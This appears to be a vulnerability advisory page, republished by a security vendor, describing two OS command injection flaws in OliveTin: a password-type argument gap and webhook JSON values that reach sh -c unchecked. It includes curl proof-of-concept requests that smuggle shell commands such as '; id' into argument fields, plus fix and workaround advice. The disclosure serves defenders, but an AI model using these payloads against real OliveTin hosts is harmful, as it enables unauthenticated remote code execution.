GHSA-49gm-hh7w-wfvf
CRITICALOliveTin: OS Command Injection via `password` argument type and webhook JSON extraction bypasses shell safety checks
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
github.com/OliveTin/OliveTinReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects Go packages — download data is not available via public APIs for these ecosystems.
Description
Summary
OliveTin's shell mode safety check (checkShellArgumentSafety) blocks several dangerous argument types but not password. A user supplying a password-typed argument can inject shell metacharacters that execute arbitrary OS commands. A second independent vector allows unauthenticated RCE via webhook-extracted JSON values that skip type safety checks entirely before reaching sh -c.
Details
Vector 1 — password type bypasses shell safety check (PR:L)
service/internal/executor/arguments.go has two gaps:
// Line 198-199 — TypeSafetyCheck returns nil (no error) for password type
case "password":
return nil // accepts ANY string including ; | ` $()
// Line 313 — checkShellArgumentSafety blocks dangerous types but not password
unsafe := map[string]bool{
"url": true,
"email": true,
"raw_string_multiline": true,
"very_dangerous_raw_string": true,
// "password" is absent — not blocked
}
Shell execution at service/internal/executor/executor_unix.go:18:
exec.CommandContext(ctx, "sh", "-c", finalParsedCommand)
A user supplies a password argument value of '; id; echo ' → sh -c interprets the shell metacharacters → arbitrary command execution.
This is not the "admin already has access" pattern: OliveTin explicitly enforces an admin/user boundary where admins define commands and users only supply argument values. The password type is the documented, intended mechanism for user-supplied sensitive values. The safety check exists precisely to prevent users from escaping this boundary — password is the one type it fails to block.
Vector 2 — Webhook JSON extraction skips TypeSafetyCheck entirely (PR:N)
service/internal/executor/handler.go:153-157 extracts arbitrary key-value pairs from webhook JSON payloads and injects them into ExecutionRequest.Arguments. These webhook-extracted arguments have no corresponding config-defined ActionArgument entry, so parseActionArguments() in arguments.go finds no type to check against and skips TypeSafetyCheck entirely. The values are templated directly into the shell command and passed to sh -c.
Example: an admin command template git pull && echo {{ git_message }} with Shell mode enabled. A webhook POST with {"git_message": "x; id"} injects id into the shell command. The webhook endpoint is unauthenticated by default (authType: none in default config).
PoC
# Vector 1 — authenticated user with password-type argument
curl -X POST http://localhost:1337/api/StartAction \
-H "Content-Type: application/json" \
-d '{"actionId": "run-command", "arguments": [{"name": "pass", "value": "'; id; echo '"}]}'
# Vector 2 — unauthenticated webhook
curl -X POST http://localhost:1337/webhook/git-deploy \
-H "Content-Type: application/json" \
-d '{"git_message": "x; id #", "git_author": "attacker"}'
Confirmed on jamesread/olivetin:latest (3000.10.0), 3/3 runs. Both vectors produced uid=1000(olivetin) output and arbitrary file write to /tmp/pwned.
Impact
- Vector 1: Any authenticated user (registration enabled by default,
authType: noneby default) can execute arbitrary OS commands on the OliveTin host with the permissions of the OliveTin process. - Vector 2: Unauthenticated attacker can achieve the same if the instance receives webhooks from external sources, which is a primary OliveTin use case.
Combined: unauthenticated RCE on any OliveTin instance using Shell mode with webhook-triggered actions.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐹Go | github.com/OliveTin/OliveTin | all versions | 0.0.0-20260222101908-4bbd2eab1532 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/OliveTin/OliveTin. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update github.com/OliveTin/OliveTin to 0.0.0-20260222101908-4bbd2eab1532 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-49gm-hh7w-wfvf is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-49gm-hh7w-wfvf is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-49gm-hh7w-wfvf. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-49gm-hh7w-wfvf in your dependencies?
O3 detects GHSA-49gm-hh7w-wfvf across Go dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.